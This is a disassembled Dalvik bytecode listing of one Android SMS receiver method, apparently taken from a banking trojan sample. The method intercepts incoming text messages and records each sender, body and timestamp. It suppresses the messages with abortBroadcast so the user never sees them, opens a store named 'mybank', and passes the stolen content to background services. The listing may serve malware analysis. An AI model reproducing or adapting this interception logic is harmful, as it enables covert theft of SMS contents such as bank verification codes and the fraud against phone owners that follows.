# Lkk/receiver/LJ;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public]
#
# Parameters:
# - local registers: v0...v8
# - v9:android.content.Context
# - v10:android.content.Intent
#
# - return:void

onReceive-BB@0x0 : [ onReceive-BB@0x40 onReceive-BB@0x70 ]
	0       (00000000) invoke-virtual       v10, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
	1       (00000006) move-result-object   v4
	2       (00000008) const-string         v5, 'pdus'
	3       (0000000c) invoke-virtual       v4, v5, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
	4       (00000012) move-result-object   v4
	5       (00000014) check-cast           v4, [Ljava/lang/Object;
	6       (00000018) move-object          v2, v4
	7       (0000001a) check-cast           v2, [Ljava/lang/Object;
	8       (0000001e) const-string         v4, ''
	9       (00000022) iput-object          v4, v8, Lkk/receiver/LJ;->content Ljava/lang/String;
	10      (00000026) const/4              v3, 0
	11      (00000028) invoke-virtual       v10, Landroid/content/Intent;->getAction()Ljava/lang/String;
	12      (0000002e) move-result-object   v4
	13      (00000030) const-string         v5, 'android.provider.Telephony.SMS_RECEIVED'
	14      (00000034) invoke-virtual       v4, v5, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	15      (0000003a) move-result          v4
	16      (0000003c) if-nez               v4, +1a

onReceive-BB@0x40 : [ onReceive-BB@0x58 onReceive-BB@0x70 ]
	17      (00000040) invoke-virtual       v10, Landroid/content/Intent;->getAction()Ljava/lang/String;
	18      (00000046) move-result-object   v4
	19      (00000048) const-string         v5, 'android.provider.Telephony.SMS_RECEIVED_2'
	20      (0000004c) invoke-virtual       v4, v5, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	21      (00000052) move-result          v4
	22      (00000054) if-nez               v4, +e

onReceive-BB@0x58 : [ onReceive-BB@0x70 onReceive-BB@0x16a ]
	23      (00000058) invoke-virtual       v10, Landroid/content/Intent;->getAction()Ljava/lang/String;
	24      (0000005e) move-result-object   v4
	25      (00000060) const-string         v5, 'android.provider.Telephony.GSM_SMS_RECEIVED'
	26      (00000064) invoke-virtual       v4, v5, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	27      (0000006a) move-result          v4
	28      (0000006c) if-eqz               v4, +7f

onReceive-BB@0x70 : [ onReceive-BB@0x74 ]
	29      (00000070) array-length         v5, v2
	30      (00000072) const/4              v4, 0

onReceive-BB@0x74 : [ onReceive-BB@0x78 onReceive-BB@0xdc ]
	31      (00000074) if-ge                v4, v5, +34

onReceive-BB@0x78 : [ onReceive-BB@0x74 ]
	32      (00000078) aget-object          v1, v2, v4
	33      (0000007c) check-cast           v1, [B
	34      (00000080) check-cast           v1, [B
	35      (00000084) invoke-static        v1, Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
	36      (0000008a) move-result-object   v3
	37      (0000008c) new-instance         v6, Ljava/lang/StringBuilder;
	38      (00000090) invoke-direct        v6, Ljava/lang/StringBuilder;-><init>()V
	39      (00000096) iget-object          v7, v8, Lkk/receiver/LJ;->content Ljava/lang/String;
	40      (0000009a) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	41      (000000a0) move-result-object   v6
	42      (000000a2) invoke-virtual       v3, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
	43      (000000a8) move-result-object   v7
	44      (000000aa) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	45      (000000b0) move-result-object   v6
	46      (000000b2) invoke-virtual       v6, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	47      (000000b8) move-result-object   v6
	48      (000000ba) iput-object          v6, v8, Lkk/receiver/LJ;->content Ljava/lang/String;
	49      (000000be) invoke-virtual       v3, Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
	50      (000000c4) move-result-object   v6
	51      (000000c6) iput-object          v6, v8, Lkk/receiver/LJ;->sender Ljava/lang/String;
	52      (000000ca) invoke-virtual       v3, Landroid/telephony/SmsMessage;->getTimestampMillis()J
	53      (000000d0) move-result-wide     v6
	54      (000000d2) iput-wide            v6, v8, Lkk/receiver/LJ;->time J
	55      (000000d6) add-int/lit8         v4, v4, 1
	56      (000000da) goto                 -33

onReceive-BB@0xdc : [ onReceive-BB@0x16a ]
	57      (000000dc) new-instance         v4, Lkk/util/SPUtil;
	58      (000000e0) const-string         v5, 'mybank'
	59      (000000e4) invoke-direct        v4, v9, v5, Lkk/util/SPUtil;-><init>(Landroid/content/Context; Ljava/lang/String;)V
	60      (000000ea) iput-object          v4, v8, Lkk/receiver/LJ;->sp Lkk/util/SPUtil;
	61      (000000ee) invoke-virtual       v8, Lkk/receiver/LJ;->abortBroadcast()V
	62      (000000f4) new-instance         v4, Landroid/content/Intent;
	63      (000000f8) const-class          v5, Lkk/service/FUK;
	64      (000000fc) invoke-direct        v4, v9, v5, Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
	65      (00000102) invoke-virtual       v9, v4, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
	66      (00000108) new-instance         v0, Landroid/content/Intent;
	67      (0000010c) const-class          v4, Lkk/service/ShC;
	68      (00000110) invoke-direct        v0, v9, v4, Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
	69      (00000116) const-string         v4, 'sender'
	70      (0000011a) iget-object          v5, v8, Lkk/receiver/LJ;->sender Ljava/lang/String;
	71      (0000011e) invoke-virtual       v0, v4, v5, Landroid/content/Intent;->putExtra(Ljava/lang/String; Ljava/lang/String;)Landroid/content/Intent;
	72      (00000124) const-string         v4, 'content'
	73      (00000128) iget-object          v5, v8, Lkk/receiver/LJ;->content Ljava/lang/String;
	74      (0000012c) invoke-virtual       v0, v4, v5, Landroid/content/Intent;->putExtra(Ljava/lang/String; Ljava/lang/String;)Landroid/content/Intent;
	75      (00000132) const-string         v4, 'time'
	76      (00000136) iget-object          v5, v8, Lkk/receiver/LJ;->df Ljava/text/SimpleDateFormat;
	77      (0000013a) iget-wide            v6, v8, Lkk/receiver/LJ;->time J
	78      (0000013e) invoke-static        v6, v7, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
	79      (00000144) move-result-object   v6
	80      (00000146) invoke-virtual       v5, v6, Ljava/text/SimpleDateFormat;->format(Ljava/lang/Object;)Ljava/lang/String;
	81      (0000014c) move-result-object   v5
	82      (0000014e) invoke-virtual       v0, v4, v5, Landroid/content/Intent;->putExtra(Ljava/lang/String; Ljava/lang/String;)Landroid/content/Intent;
	83      (00000154) invoke-virtual       v9, v0, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
	84      (0000015a) new-instance         v4, Lkk/receiver/LJ$1;
	85      (0000015e) invoke-direct        v4, v8, v9, Lkk/receiver/LJ$1;-><init>(Lkk/receiver/LJ; Landroid/content/Context;)V
	86      (00000164) invoke-virtual       v4, Lkk/receiver/LJ$1;->start()V

onReceive-BB@0x16a : 
	87      (0000016a) return-void          

